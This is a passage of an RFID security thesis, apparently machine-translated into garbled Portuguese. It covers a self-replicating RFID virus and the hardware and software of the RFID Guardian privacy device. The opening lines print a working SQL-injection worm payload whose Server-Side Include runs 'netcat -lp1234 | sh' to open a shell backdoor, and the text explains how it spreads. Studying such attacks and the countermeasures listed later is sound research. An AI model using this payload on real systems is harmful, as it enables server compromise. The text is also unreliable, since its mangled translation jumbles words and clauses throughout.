TagID 123 OldContents Mas NewContents Mas ', NewContents = (select SUBSTR (SQL TEXT, 43127) FROM v $ sql ONDE INSTR (SQL TEXT ,'<!--# exec cmd = "netcat-lp1234 | sh" - > ')> 0) Mas ', NewContents = (select SUBSTR (SQL TEXT, 43127) FROM v $ sql ONDE INSTR (SQL TEXT ,'<!--# exec cmd = "netcat-lp1234 | sh" - > ')> 0) -

234

Mas

Tabela 4.4: Tabela ContainerContents infectados

4.4.4. Ativao de carga


A interface de gerenciamento de banco de dados para pesquisas de dados tag atual, com a finalidade de exibir o OldContents e colunas NewContents em um navegador web. Quando o navegador carrega o vrus (de NewContents), ele sem querer ativa o Server-Side Include, que causa uma backdoor para abrir brevemente na porta 1234 do servidor web. O atacante agora tem um shell de comando na interface de gerenciamento mquina, que tem as permisses do servidor web Apache. O atacante pode em seguida, usar netcat para comprometer ainda mais o host interface de gerenciamento, e pode at mesmo comprometer a DBs back-end, modificando e emisso de consultas irrestritas atravs da interface web.

4.4.5. Infeco de Novas tags


Aps o banco de dados infectado, novo (no infectados) tags acabar por chegar ao Sistema de RFID. NewContents dados so gravados para estas tags RFID recmchegados, usando a seguinte consulta:
SELECIONE NewContents DE ONDE ContainerContents TagId = 'tag.id';

Se NewContents acontece para conter cdigo viral, ento este exatamente o que escrita para as tags RFID. Dados gravados no tag RFID ento apagado pelo sistema, resultando na remoo do vrus da coluna NewContents. Assim para que o vrus se perpetuar, pelo menos, um SSI devem ser executadas antes de todas NewContents linhas so apagadas. (Mas a maioria dos sistemas de RFID tm lotes de tags, de modo que este no deve ser um problema srio.)

58

RFID M ALWARE

CHAP. 4

4.5. DISCUSSO
Uma vez estvamos convencidos da viabilidade de RFID malware e vrus, ns comeou a "portar" o nosso malwares RFID a uma variedade de diferentes plataformas. Estes esforos foram recebidos com sucesso moderado, mas no sem ressalvas. Os resultados so somaresumidos na Tabela 4.5. Orculo
RFID Leitor WWW Gesto OCI10 iSQL * Plus SQL Servidor PostgreSQL MySQL Exploits Injeo de SQL (consulta individual) Injeo de SQL (consulta mltipla) Cdigo de insero Buffer overflows (N)

Worms Vrus Comandos de auto-referncia (A) Quines Cargas comandos SQL XSS / SSI Comandos do sistema = Implementado com sucesso, A = Requer privilgios de administrador, C = Requer smartcard contactless

(A) (C)

(C)

(C)

(C, N) (N)

(A) N = Requer configurao fora do padro,

Tabela 4.5: Resumo de ataques contra Middleware RFID

Aprendemos que alguns componentes de middleware RFID so mais suscetveis para ataques de malware RFID do que outros. A interface de gerenciamento WWW era um grande fonte de vulnerabilidades; sobre a explorao de script, o Apache comprometida servidor web permitiu comandos no autorizado ao sistema, a manipulao do back-end Bases de dados RFID middleware, e propagao ainda mais via RFID atividade worm. C o leitor RFID do cdigo oferecido o menor nmero de possibilidades de explorao. Ns escreveu um buffer overflow baseado em RFID, (descrito na Seo 4.3.2), mas faltava qualquer generalidade, porque o endereo de retorno apenas acompanhado idntica compilado verses do programa leitor de RFID. As bases de dados realizada contra ataques de malware RFID em graus variados. MySQL provou ser mais do RFID DB malware-resistentes, enquanto a Microsoft SQL Server e Oracle iSQL * Plus sofreu mais o ataque / payload permutaes. Aqui so alguns fatores que influenciaram a susceptibilidade DBs 'vrias RFID malware: nica versus mltiplas consulta de injeo SQL. Exploits RFID poderia realizar uma nica consulta de injeo SQL em cada banco de dados, permitindo a injeo de web-scripting cargas. No entanto, vrios consulta Explora injeo de SQL foram menos bem sucedidos; da Oracle e MySQL OCI10 foram capazes de proteger contra eles, impedindo assim a injeo de SQL paycargas.

SCE . 4,5

DISCUSSO

59

Auto-replicao questes. Usando comandos de auto-referncia para RFID auto-replicao viral s trabalhou sob certas circunstncias. Por exemplo, o MySQL "SHOW FULL PROCESSLIST comando "no vai retornar um resultado utilizvel colocado no exterior do C API e PostgreSQL tem um "atraso de relatrios", que resulta no curconsulta alugar ser especificado como '<IDLE>'. Por outro lado, utilizando o atualmente em execuo de consulta no um problema com todos os bancos de dados - "SELECT SUBSTR (SQL TEXT, 43127) FROM v $ sql ONDE INSTR (TEXT SQL, %% Payload)> 0) "funciona muito bem com a Oracle (assumindo administrador privileges). Protegidos comandos do sistema. O malware RFID normalmente no conseguiu executar comandos do sistema diretamente via bases de dados. SQL Server permitiu que (assumindo privilgios de administrador), mas o resto dos bancos de dados (Oracle, MySQL, PostgreSQL) sabiamente restringir o uso de comandos do sistema para consultas SQL. Infelizmente, a WWW interface de gerenciamento foi o elo mais fraco; por SSIs injetveis, RFID exploits ainda pode executar comandos do sistema (na mquina Apache) courtesy de cada plataforma de banco de dados.

4.5.1. Consideraes sobre o espao


Talvez sem surpresa, restries de espao foram o principal fator limitante para a implementing malwares RFID em cada plataforma. Em geral, injeo de cdigo RFID exploits exigido o mnimo de espao, e vrus baseados em RFID quine required mais espao (a maioria eram grandes demais para caber em nosso teste etiquetas RFID - apenas um mnima MySQL caber vrus quine.) RFID O estouro de buffer (como implementamos los) variou com o tamanho do buffer que estava a ser explorada. Nosso teste Philips I. Cdigo tag SLI tem 28 blocos de 8 dgitos (4 byte) nmeros hexadecimais para um total de 896 bits de dados. Usando ASCII (7 bits) de codificao, 128 caracteres vai caber em um nico tag RFID. Nosso anteriormente demonstrado vrus Oracle / SSI foi de 127 personagens, mas este tradeoffs pequeno tamanho necessrio. Ns tivemos que encurtar o Oracle "Get atual consulta" cdigo para o ponto em que a replicao funciona de forma irregular quando duas tags RFID infectado so lidos simultaneamente. No entanto, vale a pena manter em mente que, como a tecnologia RFID melhora ao longo do tempo, de baixo custo etiquetas tero mais bits e, portanto, ser capaz de suportar os vrus cada vez mais complexas RFID. Outra soluo usar etiquetas RFID de alto custo, com maior capacidade (isto , contactless cartes inteligentes). Por exemplo, o MIFARE DESFire SAM inteligentes sem contato carto tem 72 kBits de armazenamento (~ 10.000 caracteres w / codificao de 7 bits ASCII). Como Contudo, este tem a desvantagem de que ele s vai funcionar em determinada aplicao cenios que permitem o uso de tags mais caro.

60

RFID M ALWARE

CHAP. 4

A soluo final espalhar exploits RFID atravs de vrias marcas. O primeiro parte do cdigo de explorao pode armazenar cdigo SQL em um local ou ambiente de DB varivel. A tag subseqentes pode ento adicionar o resto do cdigo, e ento "PREPARE" e executar a consulta SQL. No entanto, esta soluo problemtica tanto porque ele usa vrias marcas (que pode violar as restries de aplicao), alm de que exige as tags para ser lido na ordem correta. Note que isto tambm no vai funcionar para RFID vrus, uma vez que o contedo total so grandes demais para reescrever a uma tag RFID nico.

4.6. COMBATE
Agora que temos demonstrado como explorar sistemas RFID middleware, importante para designers e administradores de middleware RFID para entender como prevenir e corrigir esses problemas. Os interessados possam proteger seus sistemas RFID contra malware, seguindo os seguintes passos [129]: 1. Verificao de limites. Verificao de limites pode impedir ataques de buffer overflow atravs da deteco ou no um ndice encontra-se dentro dos limites de um array. Ele geralmente realizada pelo compilador, de modo a no induzir atrasos de tempo de execuo. Linguagens de programao que impem em tempo de execuo verificando, como Ada, Visual Basic, Java e C #, no precisa de verificao de limites. No entanto, meia-RFID software escritos em outras linguagens (como C ou C + +) deve ser compilado com limites controlo habilitado, se possvel. H tambm ferramentas que podem fazer 2. Higienizar a entrada. Cdigo de insero e ataques de injeo SQL pode ser isso facilmente automaticamente, como Valgrind [116] e da cerca eltrica [123]. impedido por dados de entrada de higienizao. Em vez de explicitamente tirando espersonagens sociais, mais fcil apenas aceitar dados que contm o padro caracteres alfanumricos (0-9, a-z, A-Z). No entanto, nem sempre possvel para eliminar todos os caracteres especiais. Por exemplo, uma tag RFID em uma biblioteca livro pode conter o nome da editora, O'Reilly. Explicitamente replicando aspas simples, aspas ou escapar com barras invertidas nem sempre ajuda eil, porque cita pode ser representado por codificaes Unicode e outros. Ele melhor usar built-in "de dados saneantes" funes, como pg escapar bytea () em Postgres e mysql seqncia de escape real () em MySQL. 3. Desativar lnguas back-end scripting. RFID middleware que usa HTTP pode mitigar injeo de script, eliminando suporte a scripts do HTTP cliente. Isso pode incluir desligando tanto do lado do cliente (ou seja, Javascript, Java, VBScript, ActiveX, Flash) e do lado do servidor lnguas (ou seja, do lado do servidorInclui).

SCE . 4,7

EuMPLICAES

61

4. Limitar as permisses de banco de dados e segregar os usurios. O banco de dados ligao deve usar os direitos mais limitada possvel. As tabelas devem ser feitas read-only ou inacessvel, porque isso limita a danos causados por suataques de injeo SQL sucedida. tambm crtico para desabilitar a execuo de vrias instrues SQL em uma nica consulta. 5. Use parmetros de ligao. Dinamicamente a construo de SQL on-the-fly dangerous. Em vez disso, melhor usar procedimentos armazenados com o parmetro binding. Parmetros ligado (usando o comando PREPARE) no so tratados como um valor, tornando os ataques de injeo SQL mais difcil. 6. Isolar o servidor middleware RFID. Compromisso da RFID de meiaservidor software no deveria automaticamente conceder acesso completo para o resto do backinfra-estrutura final. Configuraes de rede deve, portanto, limitar o acesso a outros servidores utilizando os mecanismos usuais (ie DMZs) 7. Reviso de cdigo fonte. RFID cdigo fonte middleware menos provvel de conTain erros explorveis se freqentemente analisada. "Home grown" RFID middleware deve ser criticamente auditadas. Amplamente distribuda comercial ou open-source solues RFID middleware so menos propensos a conter bugs.

Para mais informaes sobre programao segura prticas, ver o 'livros Secura Coding "[53]," Construir Secure Software "[165], e" Writing Secure Code " (Segunda edio) [68].

4.7. IMPLICAES
RFID malwares ameaa toda uma classe de aplicaes de computao ubqua. Desenvolvedores da grande variedade de sistemas de RFID avanada ter de "armadura" seus sistemas, para limitar o dano que causado, uma vez hackers comear a experimentar RFID com exploits, RFID worms, vrus e RFID em uma escala maior. Este chapter ressaltou a urgncia de tomar essas medidas preventivas pelo demnio demonstrao da viabilidade de malware RFID em vrias plataformas, e apresentando um totalmente ilustrado exemplo de um vrus de RFID auto-replicantes. A propagao de malware RFID pode lanar uma nova fronteira de gato e rato atividade que ir desempenhar na arena da tecnologia RFID. RFID malware pode causar outros fenmenos novos a aparecer, a partir de RFID phishing (Enganar leitor RFID proprietrios para ler etiquetas RFID maliciosos) para RFID wardriving ( procura de vulvulnerveis leitores RFID). As pessoas podem at mesmo desenvolver RFID honeypots para pegar o RFID wardrivers! Cada um destes casos torna cada vez mais evidente que a idade

62

RFID M ALWARE

CHAP. 4

de RFID a inocncia foi perdida. As pessoas nunca tero o luxo de cegamente confiando os dados em etiquetas de RFID novamente.

CCAPTULO 5

RFID Guardian: Plataforma Viso global


5.1. RFID GUARDIAN OVERVIEW
The Guardian RFID um dispositivo movido a bateria porttil que media interaes entre os leitores RFID e tags RFID. The Guardian RFID utiliza um on-board leitor RFID combinado com capacidades romance emulao tag para auditar e controlar a atividade RFID, assim, impor a conformidade com uma poltica de segurana especificado.

5.1.1. Metas de design


Ao longo dos ltimos dois anos, criamos um prottipo e do Guardian RFID, um sistema que permite que as pessoas para administrar a segurana de suas etiquetas de RFID. O projeto do Guardio RFID foi impulsionado pelas metas a seguir, que siga da natureza das aplicaes RFID e consideraes de implantao: Uso e gerenciamento centralizados. Contramedidas mais RFID existentes distribuir as suas polticas de segurana em toda As etiquetas RFID, que os tornam muito difcil de configurar, gerenciar e usar. Para resolver este problema, criamos uma plataforma nica para alavancar RFID patermeasures de forma coordenada. Polticas de segurana personalizadas so impostas centralmente, utilizando novos recursos de segurana RFID (auditoria, augerenciamento de chaves sintomticos, tag leitor, mediao de autenticao off-tag) toJuntos com os existentes (kill comandos, sono / viglia modos, em tag-cripseqencial). Sensibilidade ao contexto. Contramedidas diferentes tm pontos fortes e fracos em diferentes ap-

64

RFID G UARDIAN : P LATFORM OANORMICA

CHAP. 5

Figura 5.1: The Guardian RFID (V3-RevB)

cenrios plicatura. Baixo custo Electronic Product Code (EPC) tags requerem diferentes mecanismos de acesso controle de crypto-enabled caro contactless cartes inteligentes. Nosso sistema mantm tanto o contexto RFID relacionados (ie Tags RFID presente, propriedades e recursos de segurana, e sua propriedade status), bem como o contexto pessoal (ou seja, o usurio est em um ambiente no hostilente). Contexto , ento, usado em conjunto com uma lista de controle de acesso (ACL) para decidir a melhor forma de proteger as etiquetas RFID em questo. Facilidade de uso. As pessoas no querem confuso com um dispositivo de RFID de privacidade, por isso o nosso sistema deve ser tanto fsica e operacionalmente discreto. Prevemos que o nosso sistema ir ser eventualmente integrados em um PDA ou telefone mvel, de modo usurios no sero sobrecarregados com a execuo de um dispositivo extra fsica. AcCordingly, o Guardio RFID usa um processador XScale e RFID simples HW (pouco mais complexo do que RFID HW j encontrado no Nokia telefones). Alm disso, a operao do sistema foi projetado para ser no-interativas que desituaes de falta, e oferece uma interface de usurio para os casos especiais que Do mundo real usabilidade. exigem local de que o Guardian noessencialconfigurao. RFID trabalha com RFID implantado actual sistema de tems. Escolhemos um nico padro como uma prova-conceito de, para provar atech

SCE . 5,2

HARDWARE OANORMICA

65

viabilidade tcnica nossas idias. Nossa aplicao RFID Guardio suporta 13,56 MHz (HF) RFID, e compatvel com o padro ISO-15693 [3]. Esta freqncia e padro usado em uma ampla gama de aplicaes RFID, devido disponibilidade da commodity relativamente barato HW. As idias neste captulo tambm pode ser estendido a outras normas ou freqncias, dado algum esforo de engenharia extra.

5.2. Viso geral de hardware


O prottipo RFID Guardian, se destina a ajudar as pessoas a resolver seus RFID priVacy problemas de forma prtica. Portanto, ns testamos o nosso sistema contra comumente utilizados equipamentos de RFID - o MIFARE Philips / I.Code Pagoda RFID Leitor, com Philips I. Cdigo SLI (ISO-15693) tags RFID. Esta seo ser introduzir a arquitetura de hardware e software que o nosso prottipo usa para monitorar e proteger a infra-estrutura RFID.

5.2.1. Arquitetura de hardware


A arquitetura de hardware RFID Guardian apresentado na Figura 5.2.

Figura 5.2: RFID Guardian: HW Arquitetura

O RFID hardware Guardian (Verso 3) foi projetado especificamente para modularity. O HW organizado em um "backplane" e "placas de beb", bem como

66

RFID G UARDIAN : P LATFORM OANORMICA

CHAP. 5

o conceito de uma placa-me e placas de expanso conectvel em um jardim-variedade PC. Ns escolhemos este projeto modular por vrias razes. Um dos motivos foi a correct uma lacuna na verso 2 (V2) do Guardio RFID HW; V2 da RFID Guardio foi otimizado para compactao e portabilidade, e assim todos os funnalidade estava contida em um nico e integrado de circuito impresso (PCB). Mas isso teve como consequncia no intencional que os erros de design HW foram de pesadelo se no impossvel, corrigir sem estragar outros (independentes) de partes do PCB. HW desenvolvimento infelizmente no como o SW de desenvolvimento, onde voc pode manchar uma falha de projeto, hack juntos uma soluo rpida, e depois bateu recompilar. No entanto, assim como na criao SW modular, se voc colocar elementos diferentes HW funcional em separado PCBs pluggable, ento erros de design so mais fceis de corrigir: simplesmente desconecte o pedao quebrado, redesenh-lo, e ligue o PCB recm-projetado de volta para o backplane. Modular HW projeto tambm promove a capacidade de expanso. Nosso uso liberal de cabea de alfinete ers na arquitetura HW serve para a fcil adio de novos mdulos HW. Para exemplo, o Guardio RFID poderia facilmente suportar novas freqncias / tipos de RFID sistemas, uma vez que apenas um front-end analgico + cdigo Verilog (em FPGA) recessrios para uma reviso nova diretoria. Esta expanso tambm permite uma maior variedade de meios de rede (USB, WiFi, etc.) mais a adio de sensores ou atuadores. Aqui esto algumas das principais caractersticas do hardware: O backplane (mostrado na Figura 5.3, painel 1) contm uma FPGA (Altera EP2C8T144C7N Cyclone II), que atua como um rdio definido por software, que realiza todo o filtering e modulao / demodulao. Porque o FPGA configurado por Verilog cdigo, pode-se reprogramar o FPGA para mais facilmente suportar novos padres de RFID ou de outros baixo nvel de funcionalidade. Como mencionado anteriormente, o backplane tambm tem muitos pinos cabealhos, ao qual o "placas de beb" anexar. Aqui est uma viso geral das placas de beb (mostrado na Figura 5.3, painel 2): PXA bordo Este contm um Computador de Placa nica (SBC), o Triton-270 mdulo de teste estratgico, que contm um processador Intel PXA-270 processador e SRAM / ROM / Flash. O Triton-270 mdulo, ligado ao PXA bordo de um conector de 200 pinos DIMM, processa o sinal de banda bsica de o FPGA (via linhas GPIO) e hospeda o Sistema Operacional em Tempo Real (RTOS) e os de nvel superior RFID SW aplicativo de segurana relacionados. Tomamos uma deciso de design consciente de usar uma "besta" de um microcontrolador o processador Intel XScale PXA270, com 64 megabytes de SDRAM e 16 megabytes de memria Flash. Ns racionalizamos o uso do XScale pela estrita-ISO 15693 restries de tempo combinado com a carga computacional de autenticar leitores RFID. Outra vantagem do processador XScale famlia a sua ampla implantao em dispositivos portteis, o que facilita a eventual integrao do Guardio RFID em PDAs e telefones celulares.

SCE . 5,2

HARDWARE OANORMICA

67

Figura 5.3: Quadros backplane e Beb

68

RFID G UARDIAN : P LATFORM OANORMICA

CHAP. 5

Frente analgico Ends Antena + A antena recebe a rdio analgico signais, eo front end analgico (AFE) down-convertidos e amplifica a repercebida do sinal. AFE nosso atual suporta 13,56 MHz (HF) RFID, mas a natureza pluggable da AFE permite a eventual expanso de LF / UHF freqncias. Conselho de amostragem O conversor analgico-digital (ADC) (Texas Instruments ADS5203) amostras da sada do front end analgico. Conselho de oscilador Esta placa fornece o sinal de clock, que inclui um Osciladores 13,56 MHz onda quadrada, e mais 2 com definveis pelo usurio freqncias. Fonte de Alimentao Este conselho regula a tenso para facilitar as necessidades do FPGA, PXA-270 de processador, placa de amostragem, e front end analgico. JTAG Blaster Ambos FPGA e microprocessador numa cadeia JTAG. A cadeia JTAG pode ser impulsionado por um PC (para a programao / depurao a SW PXA-270) ou o microprocessador (para a programao do FPGA). Boto LED Board Esta uma interface de usurio rudimentar que contm 3 botes e 3 LEDs (dois so controlados por software em execuo no PXA270, e um um LED de energia). Conversor de Nvel Serial Line Esta placa fornece uma interface de usurio com fio de permitindo uma linha de srie sobre o qual o PXA-270 processador pode comunicar com um PC rodando um cliente de terminal (ie HyperTerminal) ouvindo uma das o RS232 ("COM") portas no computador. Mdulo Bluetooth Esta placa oferece um sem fio opcional de interface de usurio, usando um mdulo Bluetooth FlexiPanel Linkmatic. O mdulo Bluetooth usado para conectar a interface do usurio de celular Nokia (descrito na Seo 5.4). TFT Board O TFT placa controladora drives uma touchscreen resistiva que funciona como uma interface de usurio opcionais de bordo para o Guardian RFID. O placa controladora abriga uma unidade de converso de energia para o TFT e alguns-elec tronics para ler a tela de toque e controle de brilho de fundo usando I2C. Deve-se ter em mente que s porque o nosso desenvolvimento HW atual modular, que no restringe-nos de fazer uma produo mais barata e menor Verso mais tarde. Em termos de reduo de custos: o mdulo de Triton-270 de longe o componente mais caro no Guardian RFID HW (cerca de 150 dlares EUA), e ns j esto pensando sobre como elimin-lo da prxima verso do nosso HW.

SCE . 5,3

SOFTWARE OANORMICA

69

(Uma maneira ter o FPGA assumir algumas funes do microprocessador, o que nos permite usar um mais barato e menos potente.) Alm disso, em termos de miniaturizao: deve ser bastante simples de integrar os mdulos de HW depois que eles foram testados individualmente. No entanto, mesmo com uma verso menor de produo, existem vantagens em deixar a AFE como PCB separado, uma vez front-pluggable extremidades (para diferentes freqncias RFID) so ainda um conceito til.

5.2.2. RF Viso geral de Design


A parte analgica do nosso prottipo consiste em um "leitor de RFID" front-end que usa um leitor RFID-on-a-chip, e um "tag RFID" front end que exigiu a construo nossa emulao tag personalizado HW. Nosso leitor de transmissor / receptor foi implementado usando um com-ISO-15693 pliant leitor RFID IC de Melexis (MLX90121) [106] juntamente com uma potncia estgio, com base na nota de aplicao AN90121 1 [105], que aumenta a opeo gama a 30 cm. Nosso receptor tag baseado em uma IC SA605 da Philips. O IC destina-se a um nico chip de rdio FM, mas usou-a para implementar um receptor de alta sensibilidade AM. Porque o nosso receptor alimentado por bateria (em oposio a RFID passiva-powered tags), que recebe sinais de leitor RFID at um metro e meio de distncia. Nosso transmissor tag implementa a falsificao tag "ativo" utilizando um estgio de potncia de RF e uma parte dedicada digital que gera e mistura o lateral exigida freqncias, 13,56 MHz + / - 423 kHz. Ativamente gerando a fre-lateral cas, podemos transmitir respostas tag falso at um metro e meio. Ns tambm usamos o nosso transmissor tag bsicos como o HW primitivo para gerar o RFID Sinal Guardio jamming randomizados.

5.3. Viso geral do software


The Guardian RFID como um co de guarda, mas fica com uma orelha em p, espera de perigo para aparecer. Ele monitora a atividade do mundo real, a partir de varreduras inesperadas RFID para clandestinamente localizado tags, e reage em tempo real para que esses perigos permanecem despercebidos e incontidos. SW The Guardian RFID da arquitetura reflete esta realidade event-driven. Belados seu ncleo em tempo real, do Guardian 12.694 linhas de cdigo fornecer drivers de dispositivo (Para os nossos RFID HW), uma pilha de protocolos (ISO-15693), bibliotecas de armazenamento de dados, de alta nvel de tarefas do sistema, e bibliotecas de aplicativos. O resultado 254.728 bytes de crossfuncionalidade compilado dedicado a RFID segurana e proteco da privacidade.

70

RFID G UARDIAN : P LATFORM OANORMICA

CHAP. 5

5.3.1. De Alto Nvel da Organizao


Sistema operacional The Guardian RFID apresenta um sistema holstico aos usurios, mas espreita abaixo da superfcie so rotinas de tempo crtico SW centrais que requerem coordenao. O eCos Sistema Operacional em Tempo Real (RTOS) toma o lugar de o capataz, que assegura a execuo rpida e confivel, alm de simplificar desenvolvividas ers 'por tpicos manipulao, manuseio de base comuns de interrupo, e algum dispositivo de drivers (ou seja driver RS-232). eCos foi escolhido principalmente pela sua disponibilidade para o microcontrolador PXA270, mas tambm provou ser uma excelente escolha, pois open-source, livre de custos de licenciamento, e tem uma ativa comunidade de Bibliotecas A maior parte do Guardio RFID SW trata intermedirias prodesenvolvedores. processamento passos, por exemplo, falsificao tag requer ISO-compliant modula-frame o e codificao e digitalizao de registro requer um mecanismo para cache de dados na Memria flash. Esta seo ir descrever as bibliotecas de baixo e mdio nvel que apoiar a principal funcionalidade de RFID Guardian. Drivers de dispositivos Drivers de dispositivo so o software de direo para o Guardian RFID HW. Pares motorista controlar o dispositivo tag RFID (transmissor tag / receptor), RFID leitor de dispositivo (leitor de transmissor / receptor), eo sinal de interferncia (rudo aleatrio gerado pelo transmissor tag). Drivers de dispositivo pode ler / escrever bytes e RFID marcadores (EOF, JAM SOF), e eles tambm podem fornecer informaes de cronometragem. eCos tambm convenientemente fornece drivers de dispositivo para o "interface" RS-232, que facilita uma conexo com o teclado do usurio e na tela. Pilha de protocolos Uma vez que os drivers de dispositivo de decodificao bytes de dados brutos RFID, o RFID Guardio precisa fazer sentido ainda mais fora dele, por exemplo, era um RFID tag responder a uma consulta de estoque, ou um leitor de RFID tentar ler um bloco de dados? A capacidade de compreender RFID protocolos de comunicao um pr-requisito para a tomada de decises significativas segurana de alto nvel (por exemplo, foi o comando de leitura do leitor autorizado?) por isso que o Guardio RFID contm um implementao da Parte 2 (drivers de dispositivo) e Parte 3 (Communications Protocol) da norma ISO-15693. Armazenamento de Dados Uma vez que as comunicaes RFID tem sido interpretada, a interna Estado do Guardio RFID atualizado modificando o contedo de um ou mais estruturas de dados. Geralmente, esses dados so armazenados na RAM voltil, mas "permanente" estruturas de dados so armazenados em cache para o Flash quando o processador est ocioso. O Journaling Arquivo Flash System (v2) gerencia a memria do Guardian RFID Flash, fornecendo

SCE . 5,3

SOFTWARE OANORMICA

71

filesystem estilo de acesso, coleta de lixo offline, equilibrada apagamento de blocos, e resistncia ao choque. As estruturas de dados coletivamente refletem a funcionalidade de alto nvel do Guardio RFID. Estruturas transitrias de dados incluem a lista de presena tag, lista de autenticao parcialmente aberta, lista de sesses autenticadas, lista de contexto, e temporizador lista de atividades. Estruturas permanentes de dados pode incluir tambm o RFID scan log, o acesso lista de controle, leitor lista chave de autenticao, a lista de propriedade tag, e listachave tag. Tarefas Tarefas The Guardian RFID de alto nvel do sistema so pouco pedaos virtuais de funcionalidade que se revezam controlar o comportamento do sistema. Cada tarefa desempenha um papel diferente: a tarefa tag age como um tag RFID virtual, eo leitor tarefa como uma commodity RFID leitor. A tarefa de temporizador semelhante a um relgio despertador pouco, que, periodicamente, apaga-se e estimula outros componentes do sistema em ao. O tarefa de entrada do usurio principalmente rels de entrada da vida real dispositivos de entrada do usurio para o SW manipulador apropriado. Cada uma dessas tarefas usa uma pilha de software comparvel. Um loop principal no topo nvel de espera para a atividade em seu dispositivo atribudo. Uma interrupo solicita que o dispositivo driver para decodificar e armazenar o frame (s). A tarefa seguida, chama o apropriado rotinas de alto nvel da aplicao.
"Timer" "UI" "Tag" "Reader"

Esperar para a atividade tag Leia quadro Receber padro de bits Analisar o padro de bits (ou seja, ISO-15693) Ativar alto nvel app. funcionalidade Resposta: Nada Send "tag" reply Enviar um sinal de interferncia

Figura 5.4: "Tag" Funcionalidade Task

Tarefa temporizador The Guardian RFID precisa executar atividades em horrios especficos, quer periodicamente (polling ou seja, para preencher a lista de presena RFID tag), ou em um

72

RFID G UARDIAN : P LATFORM OANORMICA

CHAP. 5

um tempo de base (ou seja, o tempo limite de meio-aberto tentativa de autenticao). O temporizador tarefa responsvel por manter a par de atividades programadas e multiplexao do Interrompe XScale de alta resoluo timer com as aes correspondentes que devem ocorrem nesses momentos. Tarefa de entrada de usurio Em raras ocasies, os usurios vo querer interagir com explicitamente The Guardian RFID. Eles podem querer configurar a ACL, realizar um RFID scan, fornecer dados de contexto, ou executar algum outro tipo de comando do sistema. O tarefa de entrada do usurio recolhe esses comandos no cornucpia de entrada disponveis dispositivos, (ie RS-232, teclado boto / / teclado / etc ..), e redireciona-los para o componentes do sistema responsvel pela desejada funcionalidade de alto nvel. Tarefa tag Emulao de tag um dos destaques do Guardio RFID, sendo freqentemente usada para alcanar alto nvel o Guardio da RFID objetivos - RFID scan logging, autenticao de leitores RFID, e falsificao de uma ou vrias etiquetas RFID. A tarefa tag a entidade responsvel pela coordenao da Guarda RFID "tagcomo "comportamento. Quando ativado por uma interrupo do receptor tag, a tarefa exige o driver de dispositivo para demodular e decodificar as consultas recebidas RFID. Este subseqentemente, ativa a funcionalidade de alto nvel acima mencionados, se necessrio. Leitor Task A tarefa do leitor, impulsionado pelos pedidos SW do temporizador e UI, coordenadas uso de RFID do Guardian leitor-on-a-chip. A tarefa realiza especiconsultas cadas (ou seja, de inventrio, de leitura / gravao de dados), e interpreta as respostas tag. Este comumente usado para a deteco de (possivelmente encoberta) etiquetas RFID, e ativar on-tag mecanismos de segurana, se houver.

5.3.2. Abstraes detalhada


Figura 5.5 d uma viso detalhada de abstraes principais Guardian RFID da SW. A arquitetura de SW tem duas metades: o lado Console (que hospeda o de alta aplicaes de nvel - ou seja, cabo serial ou interfaces celulares) e The Guardian RFID lado (que hospeda a funcionalidade em tempo real).

5.3.3. Side Console


Aplicaes Aplicaes de exemplo so um RFID terminal Guardio controle de pacotes filtering, ou para RFID sniffing, ou para um SSL-habilitado leitor RFID, ou off-line de trabalho.

SCE . 5,3

SOFTWARE OANORMICA

73

Figura 5.5: RFID Guardio Layers SW

Mdulos de biblioteca Mdulos de biblioteca incluem a implementao de GUI, e blocos de construo para noem tempo real funcionalidade como anlise trace (usando um pacote de matemtica) ou ACL manipulao. Stubs Stubs so de baixo nvel espaos reservados no console para a implementao real dos mdulos de aplicao em tempo real material na Triton. O stub embrulha um comando em um protocolo Guardio mensagem (GP), envia-lo para fora, e aguarda o de resposta.

Bluetooth / Serial Bluetooth e / ou uma conexo serial pode ser usado para conectar a interface do usurio para The Guardian RFID.

5.3.4. RFID Side The Guardian


Bluetooth / Serial Bluetooth e / ou uma conexo serial pode ser usado para conectar o Guardian RFID para a interface do usurio.

74

RFID G UARDIAN : P LATFORM OANORMICA

CHAP. 5

Esqueleto Esqueletos so wrappers ligeira para os comandos recebidos de um GP conectado Connica. Mdulos Biblioteca Estes so os mdulos do Guardio RFID que fazem o trabalho real do toolkit. Apoiam-se os mdulos do sistema, por exemplo, usando a porta cadeias de filtro para interagir com a rede de RFID, ou GP esqueletos para interagir com o console. User Interface Server tem uma thread que recebe comandos atravs de uma conexo GP, e despacha os comandos GP para o Mdulo Biblioteca apropriado. ACL Na contagem de linha, a ACL o mdulo maior biblioteca. Ele inclui um analisador (Construdo com o gerador de parser LLgen [70]) para ler as definies ACL e regras, um mdulo de ps-processamento para converter as regras para uma mais eficiente estrutura e cdigo de controle de verses para salvar e recuperar diffs. O ACL registra um filtro a cada porta de recepo RFID, e submete o quadro de entrada de suas regras. Se o veredicto DENY, uma resposta jamming quadro construdo, que enviado pela cadeia de porta filtro. Spoofer tambm tem um filtro registrado com cada porta de recepo RFID, se a falsificao apropriado, ele preenche uma resposta falsa e indica que a cadeia de filtros que a porta deve enviar essa resposta - ou uma coliso imitou se mais de uma marca falsificada iria responder, ao mesmo tempo. Seu funcionamento tambm controlveis atravs da interface do usurio. Logging pode ser usado para registrar o trfego RFID, registrando um filtro porta apropriada. Permite o registro de solicitaes, das respostas enviadas, e / ou qualquer cheirou respostas das tags externas. Os logs podem ser visto ou baixado atravs do Usurio Interface. SSL est embutido no The Guardian RFID para realizar a autenticao e criptografada conversas com leitores RFID ou Responsveis RFID irmo, e para lidar com crypto-enabled tags. Ns usamos OpenSSL porque fcil para a porta para outro substrato como RFID: apenas um BIO RFID devem ser escritos que realiza-pack etization e retransmisso. O BIO usa o ReadMultipleBlock RFID e comandos para implementar WriteMultipleBlock ler e escrever.

SCE . 5,3

SOFTWARE OANORMICA

75

Fazendo com criptografia SSL um procedimento pesado. Isto ilustrado pelo performance. A largura de banda mxima primas sobre ISO-15693 de 26,4 kbit / s. A autenticao do leitor com trocas SSL 2.5KB, que aqui leva 1.4s. Mais de um no-criptografada RFID BIO, uma largura de banda de 18 kbit / s podem ser alcanados; uma conexo criptografada chega a 8,5 kbit / s. Um dos fatores atrasar a velocidade mais baixa de computao de RFID Guardian, que faz com que timeouts porque a CPU ainda est ocupado en / decriptao. On-board Leitor pode ser controlada de forma interativa atravs da interface do usurio. Ele pode tambm fazer autnoma scans peridicos.

